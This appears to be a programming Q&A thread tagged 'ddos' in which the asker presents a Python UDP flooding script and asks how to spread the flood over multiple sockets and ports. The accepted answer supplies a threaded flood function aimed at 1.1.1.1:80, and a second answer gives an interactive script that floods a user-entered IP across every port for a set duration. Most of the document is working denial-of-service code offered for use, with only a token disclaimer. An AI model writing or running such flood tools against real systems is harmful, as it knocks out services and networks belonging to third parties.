# I want to create multiple UDP sockets

Tags: python, sockets, udp, ddos

```
import socket
import time


ADDRESS = ("192.168.0.100",4119)

DATA = bytes.fromhex("AA AA AA AA")

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
s.connect(ADDRESS)

for i in range(0,99999999):
    s.send(DATA)

s.close()
```

The code above is a simple UDP Flooding Python code. When the attack starts, only one socket is created, so only one port is created. I want to modify my code to create multiple sockets and send packets through various ports. Where do I need to fix it?

(Don't use this code for bad purposes.)

Comment: Apart from creating a new socket for each send is obvious with basic knowledge of Python (just put it inside the loop) everything could be done with a single socket: just don't connect the socket and use [sendto](https://docs.python.org/3/library/socket.html#socket.socket.sendto) instead of `send`.

Comment: It's my fault. Please exclude the method of putting it in the for statement from the answer. Sorry for not telling you in advance. Can't it be made using a double for statement?

Comment: If _putting_ something _in the for statement_ is excluded, it indeed cannot _be made using a double for statement_, as this is a _for statement_ _in the for statement_.

Answer (score 1, accepted):

```py
import random
import socket
import threading


def flood(ip, port, size):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    if port == 0:
        while 1:
            s.sendto(random.randbytes(100), (ip, random.randint(1, 65535)))
    else:
        while 1:
            s.sendto(random.randbytes(size), (ip, port))


# 10 Threads
def main():
    Threads = [threading.Thread(target=flood("1.1.1.1", 80, 100)) for x in range(10)]
    for thread in Threads:
        thread.start()
    for thread in Threads:
        thread.join()


if __name__ == "__main__":
    main()
```

Answer (score 0):

```
import random
import sys
import socket
import time
import os


port = 1
ip = input("\nenter IP: ")
dur = int(input("\nenter Duration:"))
bytes = os.urandom(1024)
socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sent = int(0)
timeout = time.time()+dur


while 1 == 1:
    try:
        if time.time()>timeout:
            sys.exit()
        else:
            socket.sendto(bytes,(ip, port))
            sent = sent+1
            if port == 65535:
                port = 1
            else:
                port = port+1
            print (sent, ip, port)
    except KeyboardInterrupt:
        sys.exit()
```